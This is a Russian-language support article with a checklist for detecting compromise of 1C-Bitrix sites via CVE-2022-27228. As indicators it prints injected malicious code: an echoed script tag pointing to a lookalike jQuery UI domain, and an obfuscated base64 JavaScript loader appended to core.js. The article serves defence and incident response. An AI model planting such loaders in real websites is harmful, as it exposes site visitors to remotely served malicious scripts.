Чек-лист для проверки сайта 1С-Битрикс на уязвимость

В данной статье содержится чек-лист, с помощью которого вы можете проверить факт заражения вашего сайта (CVE-2022-27228).

Отметим, что даже если отдельные пункты подтвердились, то ваш сайт, скорее всего, был взломан:

1. В каждой директории сайта появились файлы ".htaccess"
2. В списке агентов есть подобный агент с вредоносным кодом:
bx-agent
3. Отсутствует файл конфигурации "/bitrix/.settings.php"
4. Вы обнаружили изменения в главном индексном файле "index.php"
5. В конце файла "bitrix/modules/main/include/prolog.php" появилась лишняя строка:
echo "<script src='****s://**de.jquery-uii.**m/jquery-ui.js'></script>";
6. В конце файла "bitrix/js/main/core/core.js" появилась лишняя строка:
s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);
7. Наличие подозрительных вставок кода в файлах "bitrix/modules/main/bx_root.php" и "bitrix/modules/main/include/prolog_after.php"
 
 
Важно!
В случае, если ваш сайт был взломан, вам необходимо обратиться к разработчику для очистки сайта от вредоносного кода и обновления CMS и всех модулей сайта (таким образом закрываются уязвимости кода).


Если решение вопроса найти не удалось, Вы можете отправить нам заявку:



(2 голос(а))
Эта статья помогла
Эта статья не помогла

Комментарии (0)